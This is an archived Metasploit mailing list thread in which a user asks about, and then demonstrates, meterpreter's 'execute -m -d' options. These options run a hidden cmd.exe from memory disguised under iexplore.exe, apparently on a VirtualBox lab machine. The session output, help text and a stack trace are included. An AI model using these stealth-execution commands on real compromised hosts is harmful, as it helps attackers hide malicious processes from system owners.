Metasploit mailing list archives
meterpreter execute from memory
From: reydecopas at gmail.com (reydecopas)
Date: Tue, 3 Feb 2009 16:19:03 +0100
Ok, clear enough... -f local_EXE_file meterpreter > execute -f cmd.exe -H -i -m -d c:\\progra~1\\intern~1\\iexplore.exe Process 176 created. Channel 4 created. Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\Documents and Settings\admin\Desktop>tasklist tasklist Image Name PID Session Name Session# Mem Usage ========================= ====== ================ ======== ============ System Idle Process 0 Console 0 16 K System 4 Console 0 212 K smss.exe 328 Console 0 372 K csrss.exe 584 Console 0 3,328 K winlogon.exe 608 Console 0 5,096 K services.exe 652 Console 0 3,644 K savedump.exe 664 Console 0 2,388 K lsass.exe 672 Console 0 1,308 K svchost.exe 824 Console 0 4,284 K svchost.exe 892 Console 0 3,728 K svchost.exe 988 Console 0 15,736 K svchost.exe 1048 Console 0 2,844 K svchost.exe 1200 Console 0 4,184 K explorer.exe 1400 Console 0 16,448 K spoolsv.exe 1540 Console 0 4,064 K VBoxTray.exe 1640 Console 0 1,896 K VBoxService.exe 1972 Console 0 1,260 K wscntfy.exe 492 Console 0 1,736 K alg.exe 832 Console 0 3,144 K wuauclt.exe 1444 Console 0 6,232 K met-rev.exe 1668 Console 0 3,084 K procexp.exe 1580 Console 0 6,604 K wmiprvse.exe 1936 Console 0 5,588 K IEXPLORE.EXE 176 Console 0 1,516 K tasklist.exe 2036 Console 0 3,964 K C:\Documents and Settings\admin\Desktop> On Tue, Feb 3, 2009 at 3:32 PM, reydecopas <reydecopas at gmail.com> wrote:
Hi, I don't understand the parameters of execute command (-d -m) This works perfect: meterpreter > execute -f cmd.exe -H -i Process 1220 created. Channel 33 created. Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\Documents and Settings\admin\Desktop> but when does it make sense to use -d and -m paremeters? Can anyone send an example? meterpreter > execute -h Usage: execute -f file [options] Executes a command on the remote machine. OPTIONS: -H Create the process hidden from view. -a <opt> The arguments to pass to the command. -c Channelized I/O (required for interaction). -d <opt> The 'dummy' executable to launch when using -m. -f <opt> The executable command to run. -h Help menu. -i Interact with the process after creating it. -m Execute from memory. -t Execute process with currently impersonated thread token I get this error: meterpreter > execute -f cmd.exe -H -i -d calc.exe -m [-] Error running command execute: No such file or directory - cmd.exe /home/user/metasploit/lib/rex/post/meterpreter/extensions/stdapi/sys/process.rb:139:in `initialize'/home/user/metasploit/lib/rex/post/meterpreter/extensions/stdapi/sys/process.rb:139:in `new'/home/user/metasploit/lib/rex/post/meterpreter/extensions/stdapi/sys/process.rb:139:in `execute'/home/user/metasploit/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb:120:in `cmd_execute'/home/user/metasploit/lib/rex/ui/text/dispatcher_shell.rb:234:in `send'/home/user/metasploit/lib/rex/ui/text/dispatcher_shell.rb:234:in `run_command'/home/user/metasploit/lib/rex/post/meterpreter/ui/console.rb:94:in `run_command'/home/user/metasploit/lib/rex/ui/text/dispatcher_shell.rb:196:in `run_single'/home/user/metasploit/lib/rex/ui/text/dispatcher_shell.rb:191:in `each'/home/user/metasploit/lib/rex/ui/text/dispatcher_shell.rb:191:in `run_single'/home/user/metasploit/lib/rex/post/meterpreter/ui/console.rb:60:in `interact'/home/user/metasploit/lib/rex/ui/text/shell.rb:123:in `call'/home/user/metasploit/lib/rex/ui/text/shell.rb:123:in `run'/home/user/metasploit/lib/rex/post/meterpreter/ui/console.rb:58:in `interact'/home/user/metasploit/lib/msf/base/sessions/meterpreter.rb:181:in `_interact'/home/user/metasploit/lib/rex/ui/interactive.rb:48:in `interact'/home/user/metasploit/lib/msf/ui/console/command_dispatcher/core.rb:918:in `cmd_sessions'/home/user/metasploit/lib/rex/ui/text/dispatcher_shell.rb:234:in `send'/home/user/metasploit/lib/rex/ui/text/dispatcher_shell.rb:234:in `run_command'/home/user/metasploit/lib/rex/ui/text/dispatcher_shell.rb:196:in `run_single'/home/user/metasploit/lib/rex/ui/text/dispatcher_shell.rb:191:in `each'/home/user/metasploit/lib/rex/ui/text/dispatcher_shell.rb:191:in `run_single'/home/user/metasploit/lib/msf/ui/console/command_dispatcher/exploit.rb:143:in `cmd_exploit'/home/user/metasploit/lib/rex/ui/text/dispatcher_shell.rb:234:in `send'/home/user/metasploit/lib/rex/ui/text/dispatcher_shell.rb:234:in `run_command'/home/user/metasploit/lib/rex/ui/text/dispatcher_shell.rb:196:in `run_single'/home/user/metasploit/lib/rex/ui/text/dispatcher_shell.rb:191:in `each'/home/user/metasploit/lib/rex/ui/text/dispatcher_shell.rb:191:in `run_single'/home/user/metasploit/lib/rex/ui/text/shell.rb:127:in `run'./msfconsole:82
-------------- next part -------------- An HTML attachment was scrubbed... URL: <http://mail.metasploit.com/pipermail/framework/attachments/20090203/1ec044cf/attachment.htm>
Current thread:
- meterpreter execute from memory reydecopas (Feb 03)
- meterpreter execute from memory reydecopas (Feb 03)